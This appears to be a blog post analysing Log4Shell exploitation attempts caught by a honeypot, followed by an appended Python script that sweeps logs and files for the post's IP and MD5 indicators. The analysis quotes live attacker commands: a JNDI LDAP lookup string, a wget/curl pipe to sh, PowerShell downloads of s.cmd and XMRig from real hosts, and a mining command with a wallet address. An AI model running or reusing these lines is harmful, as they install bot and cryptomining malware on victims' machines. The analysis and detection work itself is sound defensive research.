Intro
On December 9, 2021 CVE-2021-44228 (Log4Shell) was disclosed. It affects Log4j 2, the logging library used by a large share of Java applications. When a logged string contains a JNDI lookup of the form ${jndi:ldap://host/path}, the library resolves it, fetches a reference from the attacker's server and loads attacker-supplied code, so this is an unauthenticated RCE, and attacks have been ongoing for a few weeks. I wanted to check out some active exploits and dive into what exactly they are doing. I have created a GitHub repository and added some of the files found from looking into the attempted exploitation of a honeypot I set up.
Project GitHub: https://github.com/zcrosman/log4j-malware
Setting up a honeypot
Setting up a honeypot to analyze basic exploitation attempts is extremely simple. I used a honeypot created by MalwareTech that was already set up and easily deployable. I only made a couple of changes to the configuration of the ports and server name.
Figure: test of an exploitation attempt shows that detection is working
After setting up the honeypot, it becomes a waiting game. Within an hour, the first exploitation attempt came through. For each attempt, the malicious JNDI string is injected into four different request fields: the attacker does not know which header or parameter the target application logs, so every likely candidate is sprayed at once.
Figure: attempted exploitation from several fields
Analyzing the attempted exploitation
I pulled the Exploit.class served by the host identified above (the class the JNDI lookup makes the victim load) to see what it was doing. There are two main parts. If the victim is a Linux host, it downloads and executes the ‘log’ file. On Windows hosts, the ‘z.cmd’ and ‘setup_moneroocean_miner.bat’ files are downloaded and executed.
Figure: full Exploit.class source
Further analysis of Linux exploitation
For Linux hosts, Exploit.class downloads and runs ‘log’, a shell script that in turn downloads and attempts to execute three more files: two ELF binaries (‘pty3’ and ‘pty4’) and a further shell script (‘ldm’).
(wget -qO - http://51.250.28.5/.l/log | curl http://51.250.28.5/.l/log) | sh |
Figure: the ‘log’ file
Both pty files are ELF executables: ‘pty3’ is the 64-bit build and ‘pty4’ is the 32-bit build, so the script can run on either architecture. Looking up their hashes on VirusTotal shows both are known malicious, and several engines classify them as Tsunami, the Kaiten-derived IRC bot family used for DDoS.
Figure: pty3 VirusTotal analysis
Figure: pty4 VirusTotal analysis
Additionally, the script downloads and runs the ‘ldm’ file. This is just a bash script that runs on top of the two executables. I have added this file to the GitHub repo.
Further analysis of Windows exploitation
If the vulnerable host is running Windows, the commands below are run through PowerShell. The first stage downloads ‘s.cmd’ and the XMRig binary (saved as xmrig.exe) from paths under a WordPress theme directory on two different hosts, which suggests compromised WordPress sites are being used for hosting, and then starts XMRig against the SupportXMR pool with the attacker's Monero wallet address. A second stage fetches the public MoneroOcean xmrig_setup script from GitHub to set up the miner. Two of the captured command lines are cut off.
new-object System.Net.WebClient).DownloadFile('http://150.60.139.51:80/wp-content/themes/twentyseventeen/s.cmd'
powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://68.183.165.105:80/wp-content/themes/twentyseventeen/xmrig64.exe','xmrig.exe')
xmrig.exe -o pool.supportxmr.com:5555 -u 46QBumovWy4dLJ4R8wq8JwhHKWMhCaDyNDEzvxHFmAHn92EyKrttq6LfV6if5UYDAyCzh3egWXMhnfJJrEhWkMzqTPzGzsE -p log
new-object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat')
Summary
IOCs
46.105.95[.]220
47.241.208[.]155
51.250.28[.]5
68.183.165[.]105
150.60.139[.]51
192.46.216[.]224
12cedf7cd63208ee8fd9d0359637c46c pty3
fe5177cbcb78d1aaac9e5adbb9928a74 pty4
65009620e1f8ec829801048d8200bfeb ldm.sh
4a9acf6ce16ed6b978648ef9b3eeca2f log
41857b926bb8c47e24317aafbfa8e832 s.cmd
a6ef05385cd4f14349562d98b90a39ce Exploit.class
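For anyone sweeping their own environment with the indicators above, here is an added example (not code from this post or from the linked repository) that refangs the defanged IPs, greps log lines for them as whole addresses (so a superstring such as 151.250.28.50 does not fire on 51.250.28.5), and hashes every file under a directory against the MD5 list. The log lines are constructed for illustration; the indicators are the ones listed above.

```python
import hashlib
import re
from pathlib import Path

# IOCs exactly as listed in this post (IPs defanged with [.]).
IOC_IPS_DEFANGED = [
    "46.105.95[.]220", "47.241.208[.]155", "51.250.28[.]5",
    "68.183.165[.]105", "150.60.139[.]51", "192.46.216[.]224",
]
IOC_MD5 = {
    "12cedf7cd63208ee8fd9d0359637c46c": "pty3",
    "fe5177cbcb78d1aaac9e5adbb9928a74": "pty4",
    "65009620e1f8ec829801048d8200bfeb": "ldm.sh",
    "4a9acf6ce16ed6b978648ef9b3eeca2f": "log",
    "41857b926bb8c47e24317aafbfa8e832": "s.cmd",
    "a6ef05385cd4f14349562d98b90a39ce": "Exploit.class",
}

# Constructed sample log lines: one JNDI callback to an IOC IP, one benign
# request, one non-IOC address that contains an IOC IP as a substring, and one
# download from an IOC host.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://51.250.28.5:1389/a}"',
    '10.0.0.5 - - [12/Dec/2021:03:14:08 +0000] "GET /health HTTP/1.1" 200 "curl/7.68.0"',
    "outbound connect 151.250.28.50:443",
    "wget http://150.60.139.51:80/wp-content/themes/twentyseventeen/s.cmd",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into its matchable form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def ip_pattern(ips):
    """Regex matching any IOC IP only as a whole dotted-quad: the lookarounds
    reject a leading or trailing digit or dot, so 51.250.28.5 does not match
    inside 151.250.28.50."""
    alts = "|".join(re.escape(refang(ip)) for ip in ips)
    return re.compile(r"(?<![\d.])(?:%s)(?![\d.])" % alts)


def grep_iocs(lines, ips=IOC_IPS_DEFANGED):
    """Return (line_number, ip) for every reference to an IOC IP."""
    pat = ip_pattern(ips)
    return [(n, m.group(0)) for n, line in enumerate(lines, 1) for m in pat.finditer(line)]


def md5_file(path, chunk=1 << 20) -> str:
    """MD5 of a file, read in chunks so large binaries do not land in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep_files(root, hashes=IOC_MD5) -> dict:
    """Hash every regular file under root; return {path: ioc_name} for matches."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.is_file():
            digest = md5_file(p)
            if digest in hashes:
                hits[str(p)] = hashes[digest]
    return hits


if __name__ == "__main__":
    for lineno, ip in grep_iocs(SAMPLE_LOG):
        print(f"line {lineno}: IOC IP {ip}")
    for path, name in sweep_files("/tmp").items():
        print(f"{path}: matches {name}")
```

MD5 is used here only because that is the hash type the post publishes; expect these binaries to be recompiled or repacked frequently, so treat a hash miss as weak evidence and the IRC/pool network behaviour as the more durable signal.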